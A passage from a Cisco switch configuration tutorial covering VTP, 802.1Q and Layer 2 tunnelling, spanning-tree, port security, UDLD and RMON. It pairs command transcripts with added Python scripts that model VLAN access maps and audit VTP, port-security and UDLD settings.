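    if i + 1 < len(tokens) and tokens[i + 1][0].isdigit():
        return (tokens[i], tokens[i + 1]), i + 2
    return (tokens[i], "0.0.0.0"), i + 1


def parse_ace(line):
    """Parse one ACL entry in IOS syntax. Standard form: 'permit A W';
    extended form: 'permit <proto> <src> <dst>'. Port qualifiers (eq, range)
    are not handled: this is a teaching model, not a full IOS parser."""
    t = line.split()
    action, i = t[0], 1
    if t[i] in PROTOCOLS:            # extended ACL: protocol, source, destination
        proto, i = t[i], i + 1
        (src, src_wc), i = _addr_spec(t, i)
        (dst, dst_wc), i = _addr_spec(t, i)
    else:                            # standard ACL: source only, all IP
        proto = "ip"
        (src, src_wc), i = _addr_spec(t, i)
        dst, dst_wc = None, None
    return {"action": action, "proto": proto, "src": src, "src_wc": src_wc,
            "dst": dst, "dst_wc": dst_wc}


def acl_lookup(acl, pkt):
    """First-match ACL walk: returns 'permit', 'deny', or None if no entry matched."""
    for ace in acl:
        if ace["proto"] != "ip" and ace["proto"] != pkt["proto"]:
            continue
        if not wildcard_match(pkt["src"], ace["src"], ace["src_wc"]):
            continue
        if ace["dst"] is not None and not wildcard_match(pkt["dst"], ace["dst"], ace["dst_wc"]):
            continue
        return ace["action"]
    return None


def vacl_action(access_map, pkt):
    """Evaluate a VLAN access-map: clauses are tried in sequence-number order and
    a clause matches only when its ACL permits the packet (a deny entry or no
    entry just means 'try the next clause'). A packet that matches no clause is
    dropped, which is the implicit deny at the end of a VLAN map."""
    for _seq, clause in sorted(access_map.items()):
        if acl_lookup(clause["match"], pkt) == "permit":
            return clause["action"]
    return "drop"


def packet(src, dst, proto):
    return {"src": src, "dst": dst, "proto": proto}


# ACL 10 and map "utah" from Challenge 27: forward only 20.123.92.0 and 20.123.92.1.
ACL_10 = [parse_ace("permit 20.123.92.0 0.0.0.1")]
UTAH_MAP = {10: {"match": ACL_10, "action": "forward"}}

# Named ACL "test" and map "London 10" from Challenge 28: the ACL matches all IP.
ACL_TEST = [parse_ace("permit ip any any")]
LONDON_MAP = {10: {"match": ACL_TEST, "action": "drop"}}

# Constructed variant (not on the page): drop TCP only, forward everything else.
ACL_TCP = [parse_ace("permit tcp any any")]
LONDON_TCP_ONLY = {10: {"match": ACL_TCP, "action": "drop"},
                   20: {"match": ACL_TEST, "action": "forward"}}


if __name__ == "__main__":
    for src in ("20.123.92.1", "20.123.92.2"):
        print("utah", src, "->", vacl_action(UTAH_MAP, packet(src, "10.0.0.1", "tcp")))
    for proto in ("tcp", "udp"):
        print("London", proto, "->", vacl_action(LONDON_MAP, packet("10.0.0.5", "10.0.0.6", proto)),
              "| tcp-only map ->", vacl_action(LONDON_TCP_ONLY, packet("10.0.0.5", "10.0.0.6", proto)))
```

Two points the model makes visible: the wildcard `0.0.0.1` in Challenge 27 admits exactly two source addresses, and everything else on VLAN 1 is dropped by the implicit deny; and because the ACL `test` matches every IP protocol, the London map of Challenge 28 drops all IP traffic on VLAN 10, not only TCP. Restricting the drop to TCP needs a protocol-specific entry plus a second clause that forwards the rest, as in the constructed `LONDON_TCP_ONLY` map.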

Cisco Switch Challenge 30


Outline
This challenge involves the configuration of VTP.
Objectives
The objectives of this challenge are to:

Define VTP details.
Enable VTP pruning.

Example
# config t
(config)# vtp ?
  domain     Set the name of the VTP administrative domain.
  file       Configure IFS filesystem file where VTP configuration is stored.
  interface  Configure interface as the preferred source for the VTP IP updater address.
  mode       Configure VTP device mode
  password   Set the password for the VTP administrative domain
  pruning    Set the adminstrative domain to permit pruning
  version    Set the adminstrative domain to VTP version
(config)# vtp domain ?
WORD The ascii name for the VTP administrative domain.
(config)# vtp domain samoa
Changing VTP domain name from NULL to samoa
(config)# vtp password ?
WORD The ascii password for the VTP administrative domain.
(config)# vtp password orange
Setting device VLAN database password to orange
(config)# vtp mode server
Setting device to VTP SERVER mode.
(config)# vtp pruning ?
<cr>
(config)# vtp pruning
Pruning switched ON
(config)# vtp version ?
<1-2> Set the adminstrative domain VTP version number
(config)# vtp version 2

Otherwise the VLAN database mode can be used, such as:

# vlan database
(vlan)# vtp ?
  client       Set the device to client mode.
  domain       Set the name of the VTP administrative domain.
  password     Set the password for the VTP administrative domain.
  pruning      Set the administrative domain to permit pruning.
  server       Set the device to server mode.
  transparent  Set the device to transparent mode.
  v2-mode      Set the administrative domain to V2 mode.
(vlan)# vtp domain ?
  WORD  The ascii name for the VTP administrative domain.
(vlan)# vtp domain samoa
Changing VTP domain name from NULL to samoa
(vlan)# vtp password ?
  WORD  The ascii password for the VTP administrative domain.
(vlan)# vtp password orange
Setting device VLAN database password to orange
(vlan)# vtp server
Setting device to VTP SERVER mode.
(vlan)# vtp pruning
Pruning switched ON

Cisco Switch Challenge 31

Area: Switches VTP Server
Outline
VTP (VLAN Trunking Protocol) maintains the consistency of VLANs across a domain. This
includes the addition, deletion and renaming of VLANs across the complete network. Changes
are automatically propagated across the entire network, which minimizes configuration
errors. There is no way to send VLAN information to other switches unless VTP is enabled.
Only standard-range VLANs (1-1005) are supported. A trunk route must also be enabled for
advertisements to be sent.
Domain. If VTP is enabled, the domain name is set and the switch will listen to broadcasts
for this domain name; otherwise it will ignore them.
Mode. If VTP is disabled, the mode is set to transparent, and changes in VLANs will not be
transmitted to other switches. In server mode the switch transmits all VLAN changes; client
mode acts the same, but it is not possible to create, change or delete VLANs.
Objectives
The objectives of this challenge are to:

Define VTP server mode.
Define VTP details.
Enable a trunk route.

The commands used are:

# config t
(config)# vtp mode server
(config)# vtp domain test
(config)# vtp password testing
(config)# vtp version 2
(config)# vtp pruning

# sh vtp status

Example
> enable
# config t
(config)# vtp ?
  domain     Set the name of the VTP administrative domain.
  file       Configure IFS filesystem file where VTP configuration is stored.
  interface  Configure interface as the preferred source for the VTP IP updater address.
  mode       Configure VTP device mode
  password   Set the password for the VTP administrative domain
  pruning    Set the adminstrative domain to permit pruning
  version    Set the adminstrative domain to VTP version
(config)# vt m ?
  client       Set the device to client mode.
  server       Set the device to server mode.
  transparent  Set the device to transparent mode.
(config)# vt m server
(config)# vtp domain ?
  WORD  The ascii name for the VTP administrative domain.
(config)# vtp domain test
(config)# vtp password ?
  WORD  The ascii password for the VTP administrative domain.
(config)# vtp password testing
(config)# vtp version 2
(config)# vtp pruning
(config)# exit
Switch# sh vtp ?
  counters  VTP statistics
  password  VTP password
  status    VTP domain status
# sh vtp status
VTP Version                     : 2
Configuration Revision          : 25
Maximum VLANs supported locally : 1005
Number of existing VLANs        : 69
VTP Operating Mode              : Server
VTP Domain Name                 : test
VTP Pruning Mode                : Disabled
VTP V2 Mode                     : Disabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0x59 0xBA 0x92 0xA4 0x74 0xD5 0x42 0x29
Configuration last modified by 0.0.0.0 at 3-1-93 00:18:42
Local updater ID is 10.1.1.59 on interface Vl1 (lowest numbered VLAN interface found)
# sh vtp counters
VTP statistics:
Summary advertisements received    : 20
Subset advertisements received     : 0
Request advertisements received    : 0
Summary advertisements transmitted : 11
Subset advertisements transmitted  : 0
Request advertisements transmitted : 0
Number of config revision errors   : 0
Number of config digest errors     : 0
Number of V1 summary errors        : 0

VTP pruning statistics:

Trunk            Join Transmitted Join Received    Summary advts received from
                                                   non-pruning-capable device
---------------- ---------------- ---------------- ---------------------------


Note
With VTP, a trunk port must be defined so that advertisements can be sent.
The default details are:
VTP name = Null
VTP mode = Server
VTP version = 2
VTP password = None
VTP pruning = Disabled

Cisco Switch Challenge 32

Area: Switches VTP Client
Outline
VTP (VLAN Trunking Protocol) maintains the consistency of VLANs across a domain. This
includes the addition, deletion and renaming of VLANs across the complete network. Changes
are automatically propagated across the entire network, which minimizes configuration
errors. There is no way to send VLAN information to other switches unless VTP is enabled.
Only standard-range VLANs (1-1005) are supported. A trunk route must also be enabled for
advertisements to be sent.
Domain. If VTP is enabled, the domain name is set and the switch will listen to broadcasts
for this domain name; otherwise it will ignore them.
Mode. If VTP is disabled, the mode is set to transparent, and changes in VLANs will not be
transmitted to other switches. In server mode the switch transmits all VLAN changes; client
mode acts the same, but it is not possible to create, change or delete VLANs.
Objectives
The objectives of this challenge are to:

Define VTP client mode.
Define VTP details.
Enable a trunk route.

The commands used are:

# config t
(config)# vtp mode client
(config)# vtp domain test
(config)# vtp password testing
(config)# vtp version 2
(config)# vtp pruning

# sh vtp status

Example
> enable
# config t
(config)# vtp ?
  domain     Set the name of the VTP administrative domain.
  file       Configure IFS filesystem file where VTP configuration is stored.
  interface  Configure interface as the preferred source for the VTP IP updater address.
  mode       Configure VTP device mode
  password   Set the password for the VTP administrative domain
  pruning    Set the adminstrative domain to permit pruning
  version    Set the adminstrative domain to VTP version
(config)# vt m ?
  client       Set the device to client mode.
  server       Set the device to server mode.
  transparent  Set the device to transparent mode.
(config)# vt m client
(config)# vtp domain ?
  WORD  The ascii name for the VTP administrative domain.
(config)# vtp domain test
(config)# vtp password ?
  WORD  The ascii password for the VTP administrative domain.
(config)# vtp password testing
(config)# vtp version 2
(config)# vtp pruning
(config)# exit
# sh vtp ?
  counters  VTP statistics
  password  VTP password
  status    VTP domain status
# sh vtp status
VTP Version                     : 2
Configuration Revision          : 25
Maximum VLANs supported locally : 1005
Number of existing VLANs        : 69
VTP Operating Mode              : Client
VTP Domain Name                 : test
VTP Pruning Mode                : Disabled
VTP V2 Mode                     : Disabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0x59 0xBA 0x92 0xA4 0x74 0xD5 0x42 0x29
Configuration last modified by 0.0.0.0 at 3-1-93 00:18:42
Local updater ID is 10.1.1.59 on interface Vl1 (lowest numbered VLAN interface found)
# sh vtp counters
VTP statistics:
Summary advertisements received    : 20
Subset advertisements received     : 0
Request advertisements received    : 0
Summary advertisements transmitted : 11
Subset advertisements transmitted  : 0
Request advertisements transmitted : 0
Number of config revision errors   : 0
Number of config digest errors     : 0
Number of V1 summary errors        : 0

VTP pruning statistics:

Trunk            Join Transmitted Join Received    Summary advts received from
                                                   non-pruning-capable device
---------------- ---------------- ---------------- ---------------------------

Note
With VTP, a trunk port must be defined so that advertisements can be sent.
The default details are:
VTP name = Null
VTP mode = Server
VTP version = 2
VTP password = None
VTP pruning = Disabled
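
As an added example that is not part of the NetworkSims material, this Python snippet parses the `show vtp status` output that Challenges 31 and 32 both end with, and applies the checks a defender runs before trusting a VTP domain: operating mode, domain name, whether a password is set (read from `show vtp password` and passed in here as a boolean, since the status output never shows it), and the configuration-revision rule that decides whether a switch can be connected to the domain without its VLAN database overwriting the existing one. The sample output is constructed to match the status shown above; the function names are my own.

```python
import re

# Constructed sample modelled on the "sh vtp status" output shown in
# Challenges 31 and 32 (not captured from a real switch).
SH_VTP_STATUS = """\
VTP Version                     : 2
Configuration Revision          : 25
Maximum VLANs supported locally : 1005
Number of existing VLANs        : 69
VTP Operating Mode              : Server
VTP Domain Name                 : test
VTP Pruning Mode                : Disabled
VTP V2 Mode                     : Disabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0x59 0xBA 0x92 0xA4 0x74 0xD5 0x42 0x29
Configuration last modified by 0.0.0.0 at 3-1-93 00:18:42
Local updater ID is 10.1.1.59 on interface Vl1 (lowest numbered VLAN interface found)
"""

KV_RE = re.compile(r"^(.*?)\s*:\s*(.*)$")


def parse_vtp_status(text):
    """Turn the 'Key : value' lines of 'show vtp status' into a dict. The
    'Configuration last modified' line carries a clock time, so its colon is
    not a separator and the line is skipped."""
    status = {}
    for line in text.splitlines():
        if line.startswith("Configuration last modified"):
            continue
        m = KV_RE.match(line)
        if m:
            status[m.group(1).strip()] = m.group(2).strip()
    return status


def vtp_findings(status, password_configured):
    """Defender's review of a parsed status. 'password_configured' is what
    'show vtp password' reports (the status output never shows the password)."""
    findings = []
    mode = status.get("VTP Operating Mode", "")
    domain = status.get("VTP Domain Name", "")
    if mode in ("Server", "Client"):
        if not domain or domain.upper() == "NULL":
            findings.append("no VTP domain set: the switch adopts the first domain name it hears on a trunk")
        if not password_configured:
            findings.append("VTP domain has no password: advertisements are accepted unauthenticated")
    if mode == "Client":
        findings.append("client mode: VLANs cannot be created, changed or deleted locally")
    if status.get("VTP Pruning Mode") == "Disabled":
        findings.append("pruning disabled: broadcast and unknown-unicast traffic for every VLAN is flooded over every trunk")
    return findings


def joining_switch_is_safe(domain_revision, joining_revision):
    """In a server/client domain the highest configuration revision wins, so a
    switch added with a higher revision overwrites the existing VLAN database.
    Only connect a switch whose revision is 0 or below the domain's; otherwise
    reset it first (transparent mode or a different domain name sets it to 0)."""
    return joining_revision == 0 or joining_revision < domain_revision


if __name__ == "__main__":
    s = parse_vtp_status(SH_VTP_STATUS)
    print("mode:", s["VTP Operating Mode"], "revision:", s["Configuration Revision"])
    for f in vtp_findings(s, password_configured=False):
        print(" -", f)
    print("safe to add a switch at revision 30?",
          joining_switch_is_safe(int(s["Configuration Revision"]), 30))
```

With the defaults listed in the note above (server mode, no password), a freshly cabled switch is accepted into the domain as soon as it learns the domain name, which is why the password and revision checks belong in any pre-deployment checklist for a VTP server or client.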

Cisco Switch Challenge 33

Area: Switches VTP Client Extended Client
Outline
Mode. If VTP is disabled, the mode is set to transparent, and changes in VLANs will not be
transmitted to other switches. In server mode the switch transmits all VLAN changes; client
mode acts the same, but it is not possible to create, change or delete VLANs.
Objectives
The objectives of this challenge are to:

Define VTP transparent mode.

The commands used are:

# config t
(config)# vtp mode transparent
# sh vtp status

Example
> enable
# config t
(config)# vtp ?
  domain     Set the name of the VTP administrative domain.
  file       Configure IFS filesystem file where VTP configuration is stored.
  interface  Configure interface as the preferred source for the VTP IP updater address.
  mode       Configure VTP device mode
  password   Set the password for the VTP administrative domain
  pruning    Set the adminstrative domain to permit pruning
  version    Set the adminstrative domain to VTP version
(config)# vt m ?
  client       Set the device to client mode.
  server       Set the device to server mode.
  transparent  Set the device to transparent mode.

Cisco Switch Challenge 34

Area: Switches IEEE 802.1Q/Layer 2 tunnelling
Outline
This challenge involves configuring 802.1Q tunnelling on a switch port.
Objectives
The objectives of this challenge are to:

Define 802.1Q tunneling.
Define tagging of the VLAN ID.

The commands used are:

> enable
# config t
(config)# vlan 3
(config-vlan)# exit
(config)# int fa0/1
(config-if)# switchport access vlan 3
(config-if)# switchport mode dot1q-tunnel
(config-if)# exit
(config)# vlan dot1q tag native

Example
> enable
# config t
(config)# vlan 3
(config-vlan)# exit
(config)# int fa0/1
(config-if)# switchport access ?
  vlan  Set VLAN when interface is in access mode
(config-if)# switchport access vlan ?
  <1-4094>  VLAN ID of the VLAN when this port is in access mode
  dynamic   When in access mode, this interfaces VLAN is controlled by VMPS
(config-if)# switchport access vlan 3
(config-if)# switchport mode ?
  access        Set trunking mode to ACCESS unconditionally
  dot1q-tunnel  Set trunking mode to DOT1Q TUNNEL unconditionally
  dynamic       Set trunking mode to dynamically negotiate access or trunk mode
  trunk         Set trunking mode to TRUNK unconditionally
(config-if)# switchport mode dot1q-tunnel ?
  <cr>
(config-if)# switchport mode dot1q-tunnel
(config-if)# exit
(config)# vlan ?
  WORD        ISL VLAN IDs 1-4094
  access-map  Create vlan access-map or enter vlan access-map command mode
  dot1q       dot1q parameters
  filter      Apply a VLAN Map
  internal    internal VLAN
(config)# vlan dot1q ?
  tag  tag parameters
(config)# vlan dot1q tag ?
  native  tag native vlan
(config)# vlan dot1q tag native ?
  <cr>
(config)# vlan dot1q tag native

Cisco Switch Challenge 35

Area: Switches IEEE 802.1Q/Layer 2 tunnelling
Outline
This challenge involves configuring Layer 2 protocol tunneling.
Objectives
The objectives of this challenge are to:

Define Layer 2 protocols to tunnel.

The commands used are:

> enable
# config t
(config)# int fa0/1
(config-if)# l2protocol-tunnel cdp
(config-if)# l2protocol-tunnel stp
(config-if)# l2protocol-tunnel shutdown-threshold 100
(config-if)# exit
(config)# l2protocol-tunnel cos 5

Example
> enable
# config t
(config)# int fa0/1
(config-if)# l2protocol-tunnel ?
  cdp                 Cisco Discovery Protocol
  drop-threshold      Set drop threshold for protocol packets
  point-to-point      point-to-point L2 Protocol
  shutdown-threshold  Set shutdown threshold for protocol packets
  stp                 Spanning Tree Protocol
  vtp                 Vlan Trunking Protocol
  <cr>
(config-if)# l2protocol-tunnel cdp
(config-if)# l2protocol-tunnel stp
(config-if)# l2protocol-tunnel shutdown-threshold ?
  <1-4096>        Packets/sec rate beyond which interface is put to err-disable
  cdp             Cisco Discovery Protocol
  point-to-point  point-to-point L2 Protocol
  stp             Spanning Tree Protocol
  vtp             Vlan Trunking Protocol
(config-if)# l2protocol-tunnel shutdown-threshold 100
(config)# l2protocol-tunnel ?
  cos  Class of Service
(config)# l2protocol-tunnel cos ?
  <0-7>  priority value
(config)# l2protocol-tunnel cos 5

Cisco Switch Test 2 (Challenge 36)


Unit 2: VLAN and VTP
The most up-to-date version of this test is at:
http://networksims.com/sw02.html

Cisco Switch Challenge 37


Outline
This challenge involves the configuration of spanning-tree options.
Objectives
The objectives of this challenge are to:

Setup VLANs.
Define spanning-tree settings.

Example
> en
# vlan database
(vlan)# vlan 2 name amsterdam
VLAN 2 added:
Name: amsterdam
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config)# int vlan 2
(config-if)# ip address 161.161.238.9 255.255.255.248
(config-if)# exit
(config)# spanning-tree ?
backbonefast Enable BackboneFast Feature
etherchannel Spanning tree etherchannel specific configuration
extend Spanning Tree 802.1t extensions
loopguard Spanning tree loopguard options
mode Spanning tree operating mode
pathcost Spanning tree pathcost options
portfast Spanning tree portfast options
uplinkfast Enable UplinkFast Feature
vlan VLAN Switch Spanning Tree
(config)# spanning-tree vlan ?
WORD vlan range, example: 1,3-5,7,9-11
(config)# spanning-tree vlan 2 ?
forward-time Set the forward delay for the spanning tree
hello-time Set the hello interval for the spanning tree
max-age Set the max age interval for the spanning tree
priority Set the bridge priority for the spanning tree
root Configure switch as root
<cr>
(config)# spanning-tree vlan 2 root ?
primary Configure this switch as primary root for this spanning tree
secondary Configure switch as secondary root
(config)# spanning-tree vlan 2 root primary
(config)# int fa0/1
(config-if)# spanning-tree cost 32
(config)# int fa0/2
(config-if)# spanning-tree cost 31
(config)# int fa0/3
(config-if)# spanning-tree cost 35

Cisco Switch Challenge 38


Outline
This challenge involves enabling port security and the BPDU guard (to defend against
spanning-tree attacks).
Objectives
The objectives of this challenge are to:

Enable BPDU guard.
Enable port-security.
Define a maximum number of MAC addresses on a port.
Define a MAC address on a port.

Example
> en
# config t
Switch(config)# spanning-tree ?
backbonefast Enable BackboneFast Feature
etherchannel Spanning tree etherchannel specific configuration
extend Spanning Tree 802.1t extensions
loopguard Spanning tree loopguard options
mode Spanning tree operating mode
mst Multiple spanning tree configuration
pathcost Spanning tree pathcost options
portfast Spanning tree portfast options
uplinkfast Enable UplinkFast Feature
vlan VLAN Switch Spanning Tree
Switch(config)# spanning-tree portfast ?
bpdufilter Enable portfast bdpu filter on this switch
bpduguard Enable portfast bpdu guard on this switch
default Enable portfast by default on all access ports
Switch(config)# spanning-tree portfast bpduguard ?
default Enable bdpu guard by default on all portfast ports
Switch(config)# spanning-tree portfast bpduguard def ?
<cr>
Switch(config)# spanning-tree portfast bpduguard def
Switch(config)# int fa0/1
Switch(config-if)# sw po ?
aging Port-security aging commands
mac-address Secure mac address
maximum Max secure addrs
violation Security Violation Mode
<cr>
Switch(config-if)# switchport mode access
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security max ?
<1-5120> Maximum addresses
Switch(config-if)# switchport port-security maximum 5
Switch(config-if)# switchport port-security mac-address ?
H.H.H 48 bit mac address
sticky Configure dynamic secure addresses as sticky
Switch(config-if)# switchport port-security mac-address 0000.1111.2222
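A configuration audit for the two protections this challenge enables, written as an added example for this page (not NetworkSims code): it parses a constructed IOS running-config and reports access ports that lack BPDU guard or port security, allowing for the fact that the global `spanning-tree portfast bpduguard default` only covers ports that run portfast. The interface names and the MAC address in the sample are placeholders.

```python
"""Audit an IOS running-config for the protections this challenge sets up
on access ports: BPDU guard and port security.

Added example for this page, not NetworkSims code. SAMPLE_CONFIG is a
constructed configuration; interface names and the MAC address are
placeholders in the style of the transcript above.
"""

SAMPLE_CONFIG = """\
spanning-tree portfast bpduguard default
!
interface FastEthernet0/1
 switchport mode access
 switchport port-security
 switchport port-security maximum 5
 switchport port-security mac-address 0000.1111.2222
 spanning-tree portfast
!
interface FastEthernet0/2
 switchport mode access
 switchport port-security
!
interface FastEthernet0/3
 switchport mode access
 spanning-tree bpduguard enable
!
interface FastEthernet0/4
 switchport mode trunk
!
"""


def parse_config(text):
    """Split an IOS config into global commands and per-interface commands."""
    global_cmds, interfaces, current = [], {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
        elif line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
        else:
            current = None               # '!' or a global command ends the block
            if line and line != "!":
                global_cmds.append(line)
    return global_cmds, interfaces


def audit_access_ports(text):
    """Return {interface: [findings]} for each access port; [] means it passes."""
    global_cmds, interfaces = parse_config(text)
    guard_default = "spanning-tree portfast bpduguard default" in global_cmds
    portfast_default = "spanning-tree portfast default" in global_cmds
    report = {}
    for name, cmds in interfaces.items():
        if "switchport mode access" not in cmds:
            continue                     # trunks are out of scope for this check
        findings = []
        # The global default only covers ports that actually run portfast
        # (help text above: "Enable bdpu guard by default on all portfast ports"),
        # so a port without portfast needs the per-interface command.
        portfast = portfast_default or "spanning-tree portfast" in cmds
        guarded = "spanning-tree bpduguard enable" in cmds or (guard_default and portfast)
        if not guarded:
            findings.append("no BPDU guard")
        if "switchport port-security" not in cmds:
            findings.append("port-security not enabled")
        elif not any(c.startswith("switchport port-security maximum") for c in cmds):
            findings.append("port-security maximum left at default (1)")
        report[name] = findings
    return report


if __name__ == "__main__":
    for port, findings in audit_access_ports(SAMPLE_CONFIG).items():
        print(f"{port}: {', '.join(findings) or 'OK'}")
```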

Cisco Switch Challenge 39


Outline
This challenge involves setting up UDLD (Unidirectional Link Detection), which monitors
the condition of a link and, if it detects a unidirectional link, can shut down the link and
display a message.
Objectives
The objectives of this challenge are to:

Enable UDLD.
Apply it on an interface.

Example
> enable
# config t
(config)# udld ?
aggressive Enable UDLD protocol in aggressive mode on fiber ports except where locally configured
enable Enable UDLD protocol on fiber ports except where locally configured
message Set UDLD message parameters
(config)# udld enable
(config)# int fa0/1
(config-if)# udld ?
port Enable UDLD protocol on this interface
(config-if)# udld port ?
aggressive Enable UDLD protocol in aggressive mode on this interface
<cr>
(config-if)# udld port
(config-if)# exit
(config)# exit
# sh udld
Interface Fa0/1
--Port enable administrative configuration setting: Enabled
Port enable operational state: Enabled
Current bidirectional state: Unknown
Current operational state: Link down
Message interval: 7
Time out interval: 5
No neighbor cache information stored
Interface Fa0/2
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/3
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/4
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/5
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/6
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/7
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/8
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/9
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/10
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/11
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/12
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/13
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/14
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/15
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/16
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/17
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/18
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/19
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/20
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/21
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/22
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Fa0/23
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
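As an added example (not part of the original page), a parser for the `show udld` format above that classifies each interface. The sample output is constructed: Fa0/1 and Fa0/2 copy the transcript, and Gi0/1 and Gi0/2 were added to cover the Bidirectional and Unidirectional states that the link-down ports above never reach.

```python
"""Parse the 'show udld' output format shown above into per-interface records
and classify each link. Added example for this page, not NetworkSims code.
SAMPLE_SHOW_UDLD is constructed: the first two entries copy the transcript,
Gi0/1 and Gi0/2 were added to exercise the Bidirectional and Unidirectional
states."""

SAMPLE_SHOW_UDLD = """\
Interface Fa0/1
--Port enable administrative configuration setting: Enabled
Port enable operational state: Enabled
Current bidirectional state: Unknown
Current operational state: Link down
Message interval: 7
Time out interval: 5
No neighbor cache information stored
Interface Fa0/2
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Current bidirectional state: Unknown
Interface Gi0/1
--Port enable administrative configuration setting: Enabled / in aggressive mode
Port enable operational state: Enabled / in aggressive mode
Current bidirectional state: Bidirectional
Current operational state: Advertisement - Single neighbor detected
Message interval: 15
Time out interval: 5
Interface Gi0/2
--Port enable administrative configuration setting: Enabled
Port enable operational state: Enabled
Current bidirectional state: Unidirectional
Current operational state: Port is disabled
Message interval: 15
Time out interval: 5
"""


def parse_show_udld(text):
    """Return {interface: {field: value, 'notes': [...]}}.
    The '--' that IOS prints on the first field of each block is stripped."""
    records, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Interface "):
            current = line.split(None, 1)[1]
            records[current] = {"notes": []}
        elif current is None or not line:
            continue
        elif ":" in line:
            key, value = line.lstrip("-").split(":", 1)
            records[current][key.strip()] = value.strip()
        else:
            records[current]["notes"].append(line)   # e.g. "No neighbor cache ..."
    return records


def classify(records):
    """Map each interface to one of: disabled, unidirectional, unknown, ok."""
    result = {}
    for name, rec in records.items():
        oper = rec.get("Port enable operational state", "")
        bidir = rec.get("Current bidirectional state", "")
        if oper.startswith("Disabled"):
            result[name] = "disabled"          # UDLD is not protecting this link
        elif bidir == "Unidirectional":
            result[name] = "unidirectional"    # the fault UDLD exists to catch
        elif bidir == "Bidirectional":
            result[name] = "ok"
        else:
            result[name] = "unknown"           # no neighbour seen yet (link down)
    return result


def needs_attention(text):
    """Interfaces to look at: unidirectional links first, then enabled ports
    that have never confirmed a bidirectional neighbour."""
    states = classify(parse_show_udld(text))
    order = {"unidirectional": 0, "unknown": 1}
    return sorted((n for n, s in states.items() if s in order),
                  key=lambda n: (order[states[n]], n))


if __name__ == "__main__":
    for name, state in classify(parse_show_udld(SAMPLE_SHOW_UDLD)).items():
        print(f"{name:6} {state}")
    print("needs attention:", needs_attention(SAMPLE_SHOW_UDLD))
```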

Cisco Switch Challenge 40


Outline
This challenge involves setting up UDLD (Unidirectional Link Detection), which monitors
the condition of a link and, if it detects a unidirectional link, can shut down the link and
display a message.
Objectives
The objectives of this challenge are to:

Enable UDLD.
Apply it on an interface.

Example
> enable
# config t
(config)# rm ?
alarm Configure an rmon alarm
event Configure an RMON event
(config)# rm a ?
<1-65535> alarm number
(config)# rmon a 10 ?
WORD MIB object to monitor
(config)# rmon a 10 ifEntry.20.1 ?
<1-2147483647> Sample interval
(config)# rmon a 10 ifEntry.20.1 20 ?
absolute Test each sample directly
delta Test delta between samples
(config)# rmon a 10 ifEntry.20.1 20 de ?
rising-threshold Configure the rising threshold
(config)# rmon a 10 ifEntry.20.1 20 de ris ?
<-2147483648 - 2147483647> rising threshold value
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY ?
<1-65535> Event to fire on rising threshold crossing
falling-threshold Configure the falling threshold
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal ?
<-2147483648 - 2147483647> falling threshold value
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal 0 ?
<1-65535> Event to fire on falling threshold crossing
owner Specify an owner for the alarm
<cr>
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal ANY own ?
WORD Alarm owner
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal ANY own ANY ?
<cr>
(config)# rmon alarm 10 ifEntry.20.1 20 delta rising-threshold 15 1 falling-threshold 0 owner jjohnson
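To show how the alarm configured above behaves once it is polling, here is an added example (not NetworkSims code) that models the RMON rising/falling hysteresis on a constructed series of counter readings; ifEntry.20.1 is ifOutErrors for ifIndex 1, so the alarm watches output errors per 20-second window.

```python
"""Model the alarm configured above,
    rmon alarm 10 ifEntry.20.1 20 delta rising-threshold 15 1 falling-threshold 0,
to show when its rising event (event 1) fires. Added example for this page, not
NetworkSims code. The counter samples are constructed; the rising/falling
hysteresis follows the RMON alarmTable rules (RFC 2819)."""


class RmonAlarm:
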